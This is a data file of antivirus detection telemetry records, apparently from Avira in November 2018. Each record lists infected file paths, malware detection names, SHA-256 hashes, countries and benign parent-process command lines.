  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T18:23:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installs.exe', filepath='C:\\Program Files (x86)\\SolidWorks Corp\\COSMOS M\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='5cd77127651103b0252b02ac59c6d594711b4f1e1c386aa716cf3eb325a67005', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:R+Sn98fajEKZ9QV1.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:36:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1DEBB93DB3C877B426D5B68A2574174410142B3B334DBD91F959D48322DFAB6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195135-46fb07dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9004391a\\AVSCAN-20181102-195058-4358B35C\\AVSCAN-20181102-195135-46FB07DC', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T15:50:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3831801\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T21:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downtows.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\DOWNTOWS\\DOWNTOWS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233643-5fb36c0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233643-5FB36C0F', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105542-51d6e492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-105526-4F443796\\AVSCAN-20181102-105542-51D6E492', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='amd64.bat', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\modules\\lib\\amd64\\amd64.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:50:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tripeaks.exe', filepath='\\\\?\\C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='426588c4fca05c6f3026baa2f3ee0a004dbf7a589ace3c1c094cc483f51b1e6a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180533-f0d35bf5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-180415-AE395C0C\\AVSCAN-20181102-180533-F0D35BF5', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:05:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='video.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\savedgames\\VIDEO\\VIDEO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='0e501d89fea3ac71248a3c85031911d5e6978a8377684cbeae3f3fecf33f52f6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:35:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-145841-66628ad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8267e1c0\\AVSCAN-20181103-142351-5EBE9D93\\AVSCAN-20181103-145841-66628AD8', filesize=3036000, name='TR/Crypt.ZPACK.qqbrf.#M1.#R1'), hash='25fbbf082343d30cadca3caf9574d9a735aa88df7b2fde6b8a0ee46ac10a4311', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:58:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1061d0e1699199ae5f33c83ea677e2e346b19665296a6284a082f75c1030e7ef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:54:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\36A923DC3A8D30639F68EED2531E7D5052B4C7EA466EB591E6153E15B5EFF975', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:53:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140310-989d7968', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c5347db\\AVSCAN-20181102-135921-83530A66\\AVSCAN-20181102-140310-989D7968', filesize=3420000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='043c093bb240921744cb23205229e70e67de05261e76bfa4a044fdb497d69336', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:03:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=384000, name='SPR/Hacktool.002b10.#M1.#R1'), hash='002b106a99023edc62a5bd957b6276646a15a36c45cf1aa798f74aceb4f9c504', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Patch\\Patch.exe', parentsize=390656, timestamp='2018-11-02T14:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER 4X2\\2011MY EUR OUTLANDER WM\\TOOL\\MSV\\ENV\\MSVE\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='067a9461e1b8e7f004aa4eb6bcb608af91735b9e1f860c09ef19ae487b31e48a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\07C59E235F5BFEE95665A1877145BD9EE84F0F9EA8BF3A77BF33D1BC3E92C4CE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\touch drv\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\touch drv\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123747-1dbb96fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-123747-1DBB96FB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:52:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131652-d1978692', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131652-D1978692', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T12:31:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T05:02:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061440-8db6e5e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061440-8DB6E5E1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083324-5d79a31c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_70524d91\\AVSCAN-20181102-083219-57178AFF\\AVSCAN-20181102-083324-5D79A31C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:33:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053144-8e0b5813', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053144-8E0B5813', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-222018-8223a018', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a88ce0e5\\AVSCAN-20181101-221755-6E31712B\\AVSCAN-20181101-222018-8223A018', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145001-dfefd462', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145001-DFEFD462', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145007-e135b2fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145007-E135B2FB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:14Z'), dt=datetime.date(2018, 11, 2)),
